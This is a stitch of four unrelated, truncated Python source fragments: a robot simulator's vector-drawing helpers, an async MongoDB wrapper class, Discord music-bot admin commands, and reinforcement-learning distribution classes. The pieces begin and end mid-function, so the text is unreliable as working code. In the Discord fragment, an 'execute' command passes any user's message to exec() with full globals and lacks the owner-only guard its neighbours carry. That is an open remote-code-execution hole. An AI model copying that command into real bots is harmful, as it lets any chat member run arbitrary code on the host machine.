self.update_toes_contact_info()
self.update_thighs_contact_info()
self.update_shanks_contact_info()
self.update_height_scan(debug = debug)
self.update_toes_force()
self.update_external_force()
self.update_transf_matrices()
self.update_is_fallen()
self.update_gravity_vector()
# ========================= TESTING FUNCTIONS ========================= #
def create_vector(
self,
r_o: np.array,
r_f: np.array,
length: int=1,
r: int=0,
g: int=0,
b: int=1
) -> int:
"""
Create a vector between two points in world coordinates.
Arguments:
----------
r_o: numpy.array, shape (3,)
Origin of the vector
r_f: numpy.array, shape (3,)
Final point of the vector
r: float, optional
Red color component.
Default: 0
g: float, optional
Green color component.
Default: 0
b: float, optional
Blue color component.
Default: 1
Return:
-------
Vector id.
"""
# We get the vector direction
vector = r_f - r_o
# We get the vector length
vector_length = np.linalg.norm(vector)
if vector_length == 0: return -1
# We normalize the vector
vector = vector / vector_length
# We get the pitch and yaw angles from the vector
pitch = np.arcsin(-vector[2])
yaw = np.arctan2(vector[1], vector[0])
thickness = length/400
        # The model of the vector measures 170 units in the x axis (that explains
# the scaling for the x axis)
meshScale=[length/170,thickness,thickness]
visualShapeId = p.createVisualShape(
shapeType=p.GEOM_MESH,
fileName="giadog/assets/vector.obj", rgbaColor=[r,g,b,1],
specularColor=[0.4,.4,0], visualFramePosition=[0,0,0],
meshScale=meshScale
)
orientation = p.getQuaternionFromEuler([0, pitch, yaw])
vector = p.createMultiBody(
baseMass=0,
baseOrientation=orientation,
baseVisualShapeIndex = visualShapeId,
basePosition = r_o,
useMaximalCoordinates=False
)
return vector
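    # Example: create_vector(np.array([0, 0, 0]), np.array([1, 0, 0])) gives
    # pitch = 0 and yaw = 0 (the mesh's long axis points along +x), while a
    # target straight above the origin gives pitch = -pi/2.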
def update_vector(self, vector_id: int, r_o: np.array, r_f: np.array):
"""
Update a vector.
Arguments:
----------
vector_id: int
Vector ID.
r_o: numpy.array, shape (3,)
Origin of the vector.
r_f: numpy.array, shape (3,)
| |
import functools
from copy import deepcopy
from typing import List, Dict, Optional, Union, Any, TypeVar, Type
from motor.motor_asyncio import AsyncIOMotorDatabase, AsyncIOMotorCollection
from pymongo.results import DeleteResult
T = TypeVar("T")
def return_converted(func):
"""
If we have a registered converter,
this deco will attempt to parse
the given data into our provided
class through the use of dictionary unpacking.
"""
@functools.wraps(func)
async def wrapped(*args, **kwargs):
data: Union[Dict, List[Dict]] = await func(*args, **kwargs)
self: Document = args[0]
if not data or not self.converter:
return data
if not isinstance(data, list):
return self.converter(**data)
new_data = []
for d in data:
new_data.append(self.converter(**d))
return new_data
return wrapped
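# Usage sketch (hypothetical database/collection names; assumes a reachable MongoDB):
#
#     from dataclasses import dataclass
#     from motor.motor_asyncio import AsyncIOMotorClient
#
#     @dataclass
#     class UserSettings:
#         _id: int
#         prefix: str
#
#     db = AsyncIOMotorClient("mongodb://localhost:27017")["my_db"]
#     settings = Document(db, "settings", converter=UserSettings)
#     await settings.upsert({"_id": 1, "prefix": "!"})
#     entry = await settings.find(1)   # -> UserSettings(_id=1, prefix="!")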
class Document:
_version = 9.1
def __init__(
self,
database: AsyncIOMotorDatabase,
document_name: str,
converter: Optional[Type[T]] = None,
):
"""
Parameters
----------
database: AsyncIOMotorDatabase
The database we are connected to
document_name: str
What this _document should be called
converter: Optional[Type[T]]
            An optional class; query results returned as a Dict
            (or a List of Dicts) will be unpacked into instances of it
"""
self._document_name: str = document_name
self._database: AsyncIOMotorDatabase = database
self._document: AsyncIOMotorCollection = database[document_name]
self.converter: Type[T] = converter
def __repr__(self):
return f"<Document(document_name={self.document_name})>"
# <-- Pointer Methods -->
async def find(
self, filter_dict: Union[Dict, Any]
) -> Optional[Union[Dict[str, Any], Type[T]]]:
"""
Find and return one item.
Parameters
----------
filter_dict: Union[Dict, Any]
The _id of the item to find,
if a Dict is passed that is
used as the filter.
Returns
-------
Optional[Union[Dict[str, Any], Type[T]]]
The result of the query
"""
filter_dict = self.__convert_filter(filter_dict)
return await self.find_by_custom(filter_dict)
async def delete(self, filter_dict: Union[Dict, Any]) -> Optional[DeleteResult]:
"""
Delete an item from the Document
if an item with that _id exists
Parameters
----------
filter_dict: Union[Dict, Any]
The _id of the item to delete,
if a Dict is passed that is
used as the filter.
Returns
-------
DeleteResult
The result of deletion
"""
filter_dict = self.__convert_filter(filter_dict)
return await self.delete_by_custom(filter_dict)
async def update(
self,
filter_dict: Union[Dict, Any],
data: Dict[str, Any] = None,
*args: Any,
**kwargs: Any,
) -> None:
"""
Update an existing _document within the database
Parameters
----------
filter_dict: Union[Dict, Any]
The _id of the item to update by,
if a Dict is passed that is
used as the filter.
data: Dict[str, Any]
The data we want to update with
"""
filter_dict = self.__convert_filter(filter_dict)
if data is None:
# Backwards compat so you can just pass something like
# await doc.upsert({"_id": 1, "data": False})
data = deepcopy(filter_dict)
filter_dict = self.__convert_filter(data.pop("_id"))
await self.update_by_custom(filter_dict, data, *args, **kwargs)
# <-- Actual Methods -->
@return_converted
async def get_all(
self, filter_dict: Optional[Dict[str, Any]] = None, *args: Any, **kwargs: Any
) -> List[Optional[Union[Dict[str, Any], Type[T]]]]:
"""
Fetches and returns all items
which match the given filter.
Parameters
----------
filter_dict: Optional[Dict[str, Any]]
What to filter based on
Returns
-------
List[Optional[Union[Dict[str, Any], Type[T]]]]
The items matching the filter
"""
filter_dict = filter_dict or {}
return await self._document.find(filter_dict, *args, **kwargs).to_list(None)
@return_converted
async def get_all_where_field_exists(
self, field: Any, where_field_doesnt_exist: bool = False
) -> List[Optional[Union[Dict[str, Any], Type[T]]]]:
"""
Return all of the documents which
contain the key given by `field`
Parameters
----------
field: Any
The field to match by
where_field_doesnt_exist: bool, Optional
If this is ``True``, then this method
will return all the documents without
the key denoted by `field`.
            Essentially the opposite of what's documented
            in the main doc description.
            Defaults to ``False``
        Returns
        -------
        List[Optional[Union[Dict[str, Any], Type[T]]]]
            The documents that match (or lack) the given field
        """
existence = not where_field_doesnt_exist
return await self._document.find({field: {"$exists": existence}}).to_list(None)
@return_converted
async def find_by_id(
self, data_id: Any
) -> Optional[Union[Dict[str, Any], Type[T]]]:
"""
Find and return one item.
Parameters
----------
data_id: Any
The _id of the item to find
Returns
-------
Optional[Union[Dict[str, Any], Type[T]]]
The result of the query
"""
return await self.find_by_custom({"_id": data_id})
@return_converted
async def find_by_custom(
self, filter_dict: Dict[str, Any]
) -> Optional[Union[Dict[str, Any], Type[T]]]:
"""
Find and return one item.
Parameters
----------
filter_dict: Dict[str, Any]
What to filter/find based on
Returns
-------
Optional[Union[Dict[str, Any], Type[T]]]
The result of the query
"""
self.__ensure_dict(filter_dict)
return await self._document.find_one(filter_dict)
@return_converted
async def find_many_by_custom(
self, filter_dict: Dict[str, Any]
) -> List[Union[Dict[str, Any], Type[T]]]:
"""
Find and return all items
matching the given filter
Parameters
----------
filter_dict: Dict[str, Any]
What to filter/find based on
Returns
-------
List[Union[Dict[str, Any], Type[T]]]
The result of the query
"""
self.__ensure_dict(filter_dict)
return await self._document.find(filter_dict).to_list(None)
async def delete_by_id(self, data_id: Any) -> Optional[DeleteResult]:
"""
Delete an item from the Document
if an item with that _id exists
Parameters
----------
data_id: Any
The _id to delete
Returns
-------
DeleteResult
The result of deletion
"""
return await self.delete_by_custom({"_id": data_id})
async def delete_by_custom(
self, filter_dict: Dict[str, Any]
) -> Optional[DeleteResult]:
"""
Delete an item from the Document
matching the filter
Parameters
----------
filter_dict: Any
Delete items matching this
dictionary
Returns
-------
DeleteResult
The result of deletion
"""
self.__ensure_dict(filter_dict)
result: DeleteResult = await self._document.delete_many(filter_dict)
result: Optional[DeleteResult] = result if result.deleted_count != 0 else None
return result
async def insert(self, data: Dict[str, Any]) -> None:
"""
Insert the given data into the _document
Parameters
----------
data: Dict[str, Any]
The data to insert
"""
self.__ensure_dict(data)
await self._document.insert_one(data)
async def upsert(
self,
filter_dict: Union[Dict, Any],
data: Dict[str, Any] = None,
option: str = "set",
*args: Any,
**kwargs: Any,
) -> None:
"""
Performs an UPSERT operation,
so data is either INSERTED or UPDATED
based on the current state of the _document.
Parameters
----------
filter_dict: Union[Dict, Any]
The _id of the item to update by,
if a Dict is passed that is
used as the filter.
data: Dict[str, Any]
The data to upsert (filter is _id)
option: str
The optional option to pass to mongo,
default is set
"""
# Fairly sure this is no longer needed
# if await self.find_by_id(data["_id"]) is None:
# return await self.insert(data)
filter_dict = self.__convert_filter(filter_dict)
if data is None:
# Backwards compat so you can just pass something like
# await doc.upsert({"_id": 1, "data": False})
data = deepcopy(filter_dict)
filter_dict = self.__convert_filter(data.pop("_id"))
await self.upsert_custom(filter_dict, data, option, *args, **kwargs)
async def update_by_id(
self, data: Dict[str, Any], option: str = "set", *args: Any, **kwargs: Any
) -> None:
"""
Performs an update operation.
Parameters
----------
data: Dict[str, Any]
The data to upsert (filter is _id)
option: str
The optional option to pass to mongo,
default is set
Notes
-----
If the data doesn't already
exist, this makes no changes
to the actual database.
"""
self.__ensure_dict(data)
self.__ensure_id(data)
data_id = data.pop("_id")
await self._document.update_one(
{"_id": data_id}, {f"${option}": data}, *args, **kwargs
)
async def upsert_custom(
self,
filter_dict: Dict[str, Any],
update_data: Dict[str, Any],
option: str = "set",
*args: Any,
**kwargs: Any,
) -> None:
"""
Performs an UPSERT operation,
so data is either INSERTED or UPDATED
based on the current state of the _document.
Uses filter_dict rather then _id
Parameters
----------
filter_dict: Dict[str, Any]
The data to filter on
update_data: Dict[str, Any]
The data to upsert
option: str
The optional option to pass to mongo,
default is set
"""
await self.update_by_custom(
filter_dict, update_data, option, upsert=True, *args, **kwargs
)
async def update_by_custom(
self,
filter_dict: Dict[str, Any],
update_data: Dict[str, Any],
option: str = "set",
*args: Any,
**kwargs: Any,
) -> None:
"""
Performs an update operation.
Parameters
----------
filter_dict: Dict[str, Any]
The data to filter on
update_data: Dict[str, Any]
The data to upsert
option: str
The optional option to pass to mongo,
default is set
"""
self.__ensure_dict(filter_dict)
self.__ensure_dict(update_data)
# Update
await self._document.update_one(
filter_dict, {f"${option}": update_data}, *args, **kwargs
)
async def unset(self, _id: Union[Dict, Any], field: Any) -> None:
"""
Remove a given param, basically dict.pop on the db.
Works based off _id
Parameters
----------
_id: Any
The field's _document id or
dict as a filter
field: Any
The field to remove
"""
filter_dict = self.__convert_filter(_id)
await self.unset_by_custom(filter_dict, field)
async def unset_by_custom(self, filter_dict: Dict[str, Any], field: Any) -> None:
"""
Remove a given param, basically dict.pop on the db.
Works based off _id
Parameters
----------
filter_dict: Dict[str, Any]
The fields to match on (Think _id)
field: Any
The field to remove
"""
self.__ensure_dict(filter_dict)
await self._document.update_one(filter_dict, {"$unset": {field: True}})
async def increment(
self, data_id: Union[Dict, Any], amount: Union[int, float], field: | |
import asyncio
import traceback
from contextlib import redirect_stdout
from io import BytesIO, StringIO
from textwrap import indent
import aiohttp
import discord
from musicbot import exceptions
from musicbot.settings import Settings
from musicbot.utils import Response, command_info, escape_dis, owner_only
class AdminCommands:
async def cmd_blacklist(self, message, user_mentions, option, something):
"""
///|Usage
{command_prefix}blacklist [ + | - | add | remove ] @UserName [@UserName2 ...]
///|Explanation
        Add users to or remove users from the blacklist.
"""
if not user_mentions:
raise exceptions.CommandError("No users listed.", expire_in=20)
if option not in ["+", "-", "add", "remove"]:
raise exceptions.CommandError(
"Invalid option \" % s\" specified, use +, -, add, or remove" %
option)
for user in user_mentions.copy():
if user.id == self.config.owner_id:
print(
"[Commands:Blacklist] The owner cannot be blacklisted.")
user_mentions.remove(user)
old_len = len(self.blacklist)
if option in ["+", "add"]:
self.blacklist.update(user.id for user in user_mentions)
write_file(self.config.blacklist_file, self.blacklist)
return Response(
"%s users have been added to the blacklist" %
(len(self.blacklist) - old_len),
reply=True)
else:
if self.blacklist.isdisjoint(user.id for user in user_mentions):
return Response(
"none of those users are in the blacklist.",
reply=True)
else:
self.blacklist.difference_update(user.id
for user in user_mentions)
write_file(self.config.blacklist_file, self.blacklist)
return Response(
"%s users have been removed from the blacklist" %
(old_len - len(self.blacklist)),
reply=True)
async def cmd_id(self, author, user_mentions):
"""
///|Usage
{command_prefix}id [@user]
///|Explanation
Tells the user their id or the id of another user.
"""
if not user_mentions:
return Response(
"your id is `%s`" % author.id, reply=True)
else:
usr = user_mentions[0]
return Response(
"%s's id is `%s`" % (usr.name, usr.id),
reply=True)
@owner_only
async def cmd_joinserver(self, message, server_link=None):
"""
Usage:
{command_prefix}joinserver invite_link
Asks the bot to join a server. Note: Bot accounts cannot use invite links.
"""
if self.user.bot:
url = await self.generate_invite_link()
return Response(
"Bot accounts can't use invite links! Click here to invite me: \n{}".
format(url),
reply=True,
delete_after=30)
try:
if server_link:
await self.accept_invite(server_link)
return Response(":+1:")
except:
raise exceptions.CommandError(
"Invalid URL provided:\n{}\n".format(server_link))
async def cmd_listids(self, server, author, leftover_args, cat="all"):
"""
Usage:
{command_prefix}listids [categories]
Lists the ids for various things. Categories are:
all, users, roles, channels
"""
cats = ["channels", "roles", "users"]
if cat not in cats and cat != "all":
return Response(
"Valid categories: " + " ".join(["`%s`" % c for c in cats]),
reply=True,
delete_after=25)
if cat == "all":
requested_cats = cats
else:
requested_cats = [cat] + [c.strip(",") for c in leftover_args]
data = ["Your ID: %s" % author.id]
for cur_cat in requested_cats:
rawudata = None
if cur_cat == "users":
data.append("\nUser IDs:")
rawudata = [
"%s #%s: %s" % (m.name, m.discriminator, m.id)
for m in server.members
]
elif cur_cat == "roles":
data.append("\nRole IDs:")
rawudata = ["%s: %s" % (r.name, r.id) for r in server.roles]
elif cur_cat == "channels":
data.append("\nText Channel IDs:")
tchans = [
c for c in server.channels
if c.type == discord.ChannelType.text
]
rawudata = ["%s: %s" % (c.name, c.id) for c in tchans]
rawudata.append("\nVoice Channel IDs:")
vchans = [
c for c in server.channels
if c.type == discord.ChannelType.voice
]
rawudata.extend("%s: %s" % (c.name, c.id) for c in vchans)
if rawudata:
data.extend(rawudata)
with BytesIO() as sdata:
sdata.writelines(d.encode("utf8") + b"\n" for d in data)
sdata.seek(0)
await self.send_file(
author,
sdata,
filename="%s-ids-%s.txt" % (server.name.replace(" ", "_"),
cat))
return Response(":mailbox_with_mail:")
@owner_only
async def cmd_setname(self, leftover_args, name):
"""
Usage:
{command_prefix}setname name
Changes the bot's username.
Note: This operation is limited by discord to twice per hour.
"""
name = " ".join([name, *leftover_args])
try:
await self.edit_profile(username=name)
except Exception as e:
raise exceptions.CommandError(e, expire_in=20)
return Response(":ok_hand:")
@owner_only
async def cmd_setnick(self, server, channel, leftover_args, nick):
"""
Usage:
{command_prefix}setnick nick
Changes the bot's nickname.
"""
if not channel.permissions_for(server.me).change_nickname:
raise exceptions.CommandError(
"Unable to change nickname: no permission.")
nick = " ".join([nick, *leftover_args])
try:
await self.change_nickname(server.me, nick)
except Exception as e:
raise exceptions.CommandError(e, expire_in=20)
return Response(":ok_hand:")
@owner_only
async def cmd_setavatar(self, message, url=None):
"""
Usage:
{command_prefix}setavatar [url]
Changes the bot's avatar.
Attaching a file and leaving the url parameter blank also works.
"""
        if message.attachments:
            thing = message.attachments[0]["url"]
        elif url:
            thing = url.strip("<>")
        else:
            raise exceptions.CommandError(
                "Please provide a URL or attach an image.", expire_in=20)
try:
with aiohttp.Timeout(10):
async with self.aiosession.get(thing) as res:
await self.edit_profile(avatar=await res.read())
except Exception as e:
raise exceptions.CommandError(
"Unable to change avatar: %s" % e, expire_in=20)
return Response(":ok_hand:")
async def cmd_clean(self, message, channel, server, author, search_range=50):
"""
Usage:
{command_prefix}clean [range]
Removes up to [range] messages the bot has posted in chat. Default: 50, Max: 1000
"""
try:
search_range = min(int(search_range) + 1, 1000)
        except (TypeError, ValueError):
return Response(
"enter a number. NUMBER. That means digits. `15`. Etc.",
reply=True)
await self.safe_delete_message(message, quiet=True)
def is_possible_command_invoke(entry):
valid_call = any(
entry.content.startswith(prefix)
for prefix in [self.config.command_prefix]) # can be expanded
return valid_call and not entry.content[1:2].isspace()
delete_invokes = True
delete_all = channel.permissions_for(
author).manage_messages or self.config.owner_id == author.id
def check(message):
if is_possible_command_invoke(message) and delete_invokes:
return delete_all or message.author == author
return message.author == self.user
if self.user.bot:
if channel.permissions_for(server.me).manage_messages:
deleted = await self.purge_from(
channel, check=check, limit=search_range, before=message)
return Response(
"Cleaned up {} message{}.".format(
len(deleted), "s" * bool(deleted)))
deleted = 0
async for entry in self.logs_from(
channel, search_range, before=message):
if entry == self.server_specific_data[channel.server][
"last_np_msg"]:
continue
if entry.author == self.user:
await self.safe_delete_message(entry)
deleted += 1
await asyncio.sleep(0.21)
if is_possible_command_invoke(entry) and delete_invokes:
if delete_all or entry.author == author:
try:
await self.delete_message(entry)
await asyncio.sleep(0.21)
deleted += 1
except discord.Forbidden:
delete_invokes = False
except discord.HTTPException:
pass
return Response(
"Cleaned up {} message{}.".format(deleted, "s" * bool(deleted)))
async def cmd_say(self, channel, message, leftover_args):
"""
Usage:
{command_prefix}say <message>
Make the bot say something
"""
await self.safe_delete_message(message)
await self.safe_send_message(channel, " ".join(leftover_args))
print(message.author.name + " made me say: \"" +
" ".join(leftover_args) + "\"")
async def cmd_broadcast(self, server, message, leftover_args):
"""
Usage:
{command_prefix}broadcast message
        Broadcast a message to every member of the server, or only to the
        mentioned users / the members of the role given as the first argument.
"""
targetMembers = []
msg = ""
if len(message.mentions) > 0:
print("Found mentions!")
msg = " ".join(leftover_args[len(message.mentions):])
for target in message.mentions:
print("User " + str(target) + " added to recipients")
targetMembers.append(target)
for role in server.roles:
if role.name == leftover_args[0] or role.id == leftover_args[0]:
print("Found " + role.name +
" and will send the message to them")
msg = " ".join(leftover_args[1:])
for member in server.members:
for mRole in member.roles:
if member not in targetMembers and (
mRole.name == leftover_args[0] or
mRole.id == leftover_args[0]):
print("User " + str(member) +
" added to recipients")
targetMembers.append(member)
break
break
if len(targetMembers) < 1:
print(
"Didn't find a recipient. Will send the message to everyone")
targetMembers = server.members
msg = " ".join(leftover_args)
for m in targetMembers:
if m.bot:
continue
print("Sent \"" + msg + "\" to " + str(m))
await self.safe_send_message(m, msg)
@owner_only
@command_info("3.1.6", 1498672140, {
"3.6.4": (1498146841, "Can now specify the required arguments in order to block a command"),
"3.9.8": (1499976133, "Saving the blocked commands")
})
async def cmd_blockcommand(self, command, leftover_args):
"""
///|Usage
`{command_prefix}blockcommand <command> [args] <"reason">`
///|Explanation
Block a command
"""
if command.lower() in self.blocked_commands:
self.blocked_commands.pop(command.lower())
Settings["blocked_commands"] = self.blocked_commands
return Response("Block lifted")
else:
if len(leftover_args) < 1:
return Response("Reason plz")
            args = []
            reason = None
for i, el in enumerate(leftover_args):
if not el.startswith("\""):
args.append(el)
else:
reason = " ".join(leftover_args[i:]).strip("\"")
break
if not reason:
return Response("Put your reason in quotes, idiot!")
self.blocked_commands[command.lower()] = (args, reason)
Settings["blocked_commands"] = self.blocked_commands
return Response("Blocked command `{} {}`".format(command, " ".join(args)))
@command_info("2.0.2", 1484676180, {
"3.8.3": (1499184914, "Can now use multiline statements without having to use tricks like /n/"),
"3.8.5": (1499279145, "Better code display"),
"3.9.6": (1499889309, "Escaping the result and adding the shortcut entry for player.current_entry"),
"4.3.4": (1501246003, "Don't block user anymore. That's stupid"),
"4.4.7": (1501683507, "Not showing empty result message"),
"4.4.8": (1501684956, "including the console log"),
"4.5.2": (1501965475, "only showing console log when it contains something")
})
async def cmd_execute(self, channel, author, server, raw_content, player=None):
statement = raw_content.strip()
beautiful_statement = "```python\n{}\n```".format(statement)
statement = "async def func():\n{}".format(indent(statement, "\t"))
await self.safe_send_message(channel, "**RUNNING CODE**\n{}".format(beautiful_statement))
env = {}
env.update(globals())
env.update(locals())
        env.update(entry=player.current_entry if player else None)
console = StringIO()
try:
exec(statement, env)
except SyntaxError as e:
return Response(
"**While compiling the statement the following error occured**\n{}\n{}".
format(traceback.format_exc(), str(e)))
func = env["func"]
try:
with redirect_stdout(console):
ret = await func()
except Exception as e:
return Response(
"**While executing the statement the following error occured**\n{}\n{}".
format(traceback.format_exc(), str(e)))
res = escape_dis(str(ret))
if ret is not None and res:
result = "**RESULT**\n{}".format(res)
else:
result = ""
log = console.getvalue().strip()
| |
<= 1`, where
a value of 0 gives an undamped random walk and a value of 1 gives
uncorrelated Gaussian noise. Hence in most applications a small
non-zero value is appropriate.
stddev (float): Standard deviation of the Gaussian component.
"""
super(OUProcess, self).__init__()
self._damping = damping
self._stddev = stddev
self._x = initial_value.clone().detach()
def forward(self):
noise = torch.randn_like(self._x) * self._stddev
return self._x.data.copy_((1 - self._damping) * self._x + noise)
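# Illustrative usage sketch (not from the original module). It assumes
# ``OUProcess`` subclasses ``torch.nn.Module`` (so an instance is callable) and
# that its constructor takes ``(initial_value, damping, stddev)`` as suggested
# by the docstring above. Each call applies one Ornstein-Uhlenbeck step
# x <- (1 - damping) * x + stddev * N(0, 1), so the noise stays temporally
# correlated across calls:
#
#     ou = OUProcess(torch.zeros(3), damping=0.15, stddev=0.2)
#     exploration_noise = ou()   # tensor of shape (3,)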
class DiagMultivariateNormal(td.Independent):
def __init__(self, loc, scale):
"""Create multivariate normal distribution with diagonal variance.
Args:
loc (Tensor): mean of the distribution
scale (Tensor): standard deviation. Should have same shape as ``loc``.
"""
# set validate_args to False here to enable the construction of Normal
# distribution with zero scale.
super().__init__(
td.Normal(loc, scale, validate_args=False),
reinterpreted_batch_ndims=1)
@property
def stddev(self):
return self.base_dist.stddev
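# Illustrative usage sketch (not from the original module): wrapping ``td.Normal``
# in ``td.Independent`` with ``reinterpreted_batch_ndims=1`` treats the last
# dimension as the event dimension, so ``log_prob`` sums over it while the
# leading dimensions remain batch dimensions:
#
#     dist = DiagMultivariateNormal(torch.zeros(4, 3), torch.ones(4, 3))
#     dist.batch_shape               # torch.Size([4])
#     dist.event_shape               # torch.Size([3])
#     dist.log_prob(dist.sample())   # shape (4,)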
@alf.configurable(whitelist=['eps'])
class Beta(td.Beta):
r"""Beta distribution parameterized by ``concentration1`` and ``concentration0``.
Note: we need to wrap ``td.Beta`` so that ``self.concentration1`` and
``self.concentration0`` are the actual tensors passed in to construct the
distribution. This is important in certain situation. For example, if you want
to register a hook to process the gradient to ``concentration1`` and ``concentration0``,
``td.Beta.concentration0.register_hook()`` will not work because gradient will
not be backpropped to ``td.Beta.concentration0`` since it is sliced from
``td.Dirichlet.concentration`` and gradient will only be backpropped to
``td.Dirichlet.concentration`` instead of ``td.Beta.concentration0`` or
``td.Beta.concentration1``.
"""
def __init__(self,
concentration1,
concentration0,
eps=None,
validate_args=None):
"""
Args:
concentration1 (float or Tensor): 1st concentration parameter of the distribution
(often referred to as alpha)
concentration0 (float or Tensor): 2nd concentration parameter of the distribution
(often referred to as beta)
eps (float): a very small value indicating the interval ``[eps, 1-eps]``
into which the sampled values will be clipped. This clipping can
prevent ``NaN`` and ``Inf`` values in the gradients. If None,
a small value defined by PyTorch will be used.
"""
self._concentration1 = concentration1
self._concentration0 = concentration0
super().__init__(concentration1, concentration0, validate_args)
if eps is None:
self._eps = torch.finfo(self._dirichlet.concentration.dtype).eps
else:
self._eps = float(eps)
@property
def concentration0(self):
return self._concentration0
@property
def concentration1(self):
return self._concentration1
def rsample(self, sample_shape=()):
"""We override the original ``rsample()`` in order to clamp the output
to avoid `NaN` and `Inf` values in the gradients. See Pyro's
``rsample()`` implementation in
`<https://docs.pyro.ai/en/dev/_modules/pyro/distributions/affine_beta.html#AffineBeta>`_.
"""
x = super(Beta, self).rsample(sample_shape)
return torch.clamp(x, min=self._eps, max=1 - self._eps)
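# Illustrative usage sketch (not from the original module): reparameterized
# samples are clamped into ``[eps, 1 - eps]`` so downstream ``log_prob`` and
# gradient computations never see exactly 0 or 1:
#
#     b = Beta(torch.tensor([2.0]), torch.tensor([5.0]))
#     x = b.rsample((1000,))   # shape (1000, 1), all values within [eps, 1 - eps]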
class DiagMultivariateBeta(td.Independent):
def __init__(self, concentration1, concentration0):
"""Create multivariate independent beta distribution.
Args:
concentration1 (float or Tensor): 1st concentration parameter of the
distribution (often referred to as alpha)
concentration0 (float or Tensor): 2nd concentration parameter of the
distribution (often referred to as beta)
"""
super().__init__(
Beta(concentration1, concentration0), reinterpreted_batch_ndims=1)
class AffineTransformedDistribution(td.TransformedDistribution):
r"""Transform via the pointwise affine mapping :math:`y = \text{loc} + \text{scale} \times x`.
    The reason for not using ``td.TransformedDistribution`` directly is that we can
    implement ``entropy``, ``mean``, ``variance`` and ``stddev`` for
    ``AffineTransformedDistribution``.
"""
def __init__(self, base_dist: td.Distribution, loc, scale):
"""
Args:
loc (Tensor or float): Location parameter.
scale (Tensor or float): Scale parameter.
"""
super().__init__(
base_distribution=base_dist,
transforms=AffineTransform(loc, scale))
self.loc = loc
self.scale = scale
        # broadcast scale to event_shape if necessary
s = torch.ones(base_dist.event_shape) * scale
self._log_abs_scale = s.abs().log().sum()
def entropy(self):
"""Returns entropy of distribution, batched over batch_shape.
Returns:
Tensor of shape batch_shape.
"""
return self._log_abs_scale + self.base_dist.entropy()
@property
def mean(self):
"""Returns the mean of the distribution."""
        return self.scale * self.base_dist.mean + self.loc
@property
def variance(self):
"""Returns the variance of the distribution."""
        return self.scale**2 * self.base_dist.variance
@property
    def stddev(self):
        """Returns the standard deviation of the distribution."""
        return abs(self.scale) * self.base_dist.stddev
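# Illustrative sketch (not from the original module): for y = loc + scale * x the
# differential entropy shifts by sum(log|scale|) over the event dimensions, which
# is exactly the ``_log_abs_scale`` term added in ``entropy()`` above:
#
#     base = DiagMultivariateNormal(torch.zeros(2), torch.ones(2))
#     y = AffineTransformedDistribution(base, loc=1.0, scale=3.0)
#     # y.entropy() == base.entropy() + 2 * math.log(3.0)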
class StableCauchy(td.Cauchy):
def rsample(self, sample_shape=torch.Size(), clipping_value=0.49):
r"""Overwrite Pytorch's Cauchy rsample for a more stable result. Basically
the sampled number is clipped to fall within a reasonable range.
For reference::
> np.tan(math.pi * -0.499)
-318.30883898554157
> np.tan(math.pi * -0.49)
-31.820515953773853
Args:
clipping_value (float): suppose eps is sampled from ``(-0.5,0.5)``.
It will be clipped to ``[-clipping_value, clipping_value]`` to
avoid values with huge magnitudes.
"""
shape = self._extended_shape(sample_shape)
eps = self.loc.new(shape).uniform_()
eps = torch.clamp(eps - 0.5, min=-clipping_value, max=clipping_value)
return torch.tan(eps * math.pi) * self.scale + self.loc
class DiagMultivariateCauchy(td.Independent):
def __init__(self, loc, scale):
"""Create multivariate cauchy distribution with diagonal scale matrix.
Args:
loc (Tensor): median of the distribution. Note that Cauchy doesn't
have a mean (divergent).
scale (Tensor): also known as "half width". Should have the same
shape as ``loc``.
"""
super().__init__(StableCauchy(loc, scale), reinterpreted_batch_ndims=1)
@property
def loc(self):
return self.base_dist.loc
@property
def scale(self):
return self.base_dist.scale
def _builder_independent(base_builder, reinterpreted_batch_ndims_, **kwargs):
return td.Independent(base_builder(**kwargs), reinterpreted_batch_ndims_)
def _builder_transformed(base_builder, transforms_, **kwargs):
return td.TransformedDistribution(base_builder(**kwargs), transforms_)
def _get_categorical_builder(obj: td.Categorical):
if 'probs' in obj.__dict__ and id(obj.probs) == id(obj._param):
# This means that obj is constructed using probs
return td.Categorical, {'probs': obj.probs}
else:
return td.Categorical, {'logits': obj.logits}
def _get_independent_builder(obj: td.Independent):
builder, params = _get_builder(obj.base_dist)
new_builder = functools.partial(_builder_independent, builder,
obj.reinterpreted_batch_ndims)
return new_builder, params
def _get_transformed_builder(obj: td.TransformedDistribution):
builder, params = _get_builder(obj.base_dist)
new_builder = functools.partial(_builder_transformed, builder,
obj.transforms)
return new_builder, params
def _builder_affine_transformed(base_builder, loc_, scale_, **kwargs):
# 'loc' and 'scale' may conflict with the names in kwargs. So we add suffix '_'.
return AffineTransformedDistribution(base_builder(**kwargs), loc_, scale_)
def _get_affine_transformed_builder(obj: AffineTransformedDistribution):
builder, params = _get_builder(obj.base_dist)
new_builder = functools.partial(_builder_affine_transformed, builder,
obj.loc, obj.scale)
return new_builder, params
_get_builder_map = {
td.Categorical:
_get_categorical_builder,
td.Normal:
lambda obj: (td.Normal, {
'loc': obj.mean,
'scale': obj.stddev
}),
StableCauchy:
lambda obj: (StableCauchy, {
'loc': obj.loc,
'scale': obj.scale
}),
td.Independent:
_get_independent_builder,
DiagMultivariateNormal:
lambda obj: (DiagMultivariateNormal, {
'loc': obj.mean,
'scale': obj.stddev
}),
DiagMultivariateCauchy:
lambda obj: (DiagMultivariateCauchy, {
'loc': obj.loc,
'scale': obj.scale
}),
td.TransformedDistribution:
_get_transformed_builder,
AffineTransformedDistribution:
_get_affine_transformed_builder,
Beta:
lambda obj: (Beta, {
'concentration1': obj.concentration1,
'concentration0': obj.concentration0
}),
DiagMultivariateBeta:
lambda obj: (DiagMultivariateBeta, {
'concentration1': obj.base_dist.concentration1,
'concentration0': obj.base_dist.concentration0
}),
}
def _get_builder(obj):
return _get_builder_map[type(obj)](obj)
def extract_distribution_parameters(dist: td.Distribution):
"""Extract the input parameters of a distribution.
Args:
dist (Distribution): distribution from which to extract parameters
Returns:
the nest of the input parameter of the distribution
"""
return _get_builder(dist)[1]
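# Illustrative round-trip sketch (not from the original module): ``_get_builder``
# returns a callable plus the keyword arguments needed to rebuild an equivalent
# distribution, and ``extract_distribution_parameters`` exposes just the latter:
#
#     d = DiagMultivariateNormal(torch.zeros(3), torch.ones(3))
#     builder, params = _get_builder(d)   # params == {'loc': ..., 'scale': ...}
#     d2 = builder(**params)              # an equivalent DiagMultivariateNormal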
class DistributionSpec(object):
def __init__(self, builder, input_params_spec):
"""
Args:
builder (Callable): the function which is used to build the
distribution. The returned value of ``builder(input_params)``
is a ``Distribution`` with input parameter as ``input_params``.
input_params_spec (nested TensorSpec): the spec for the argument of
``builder``.
"""
self.builder = builder
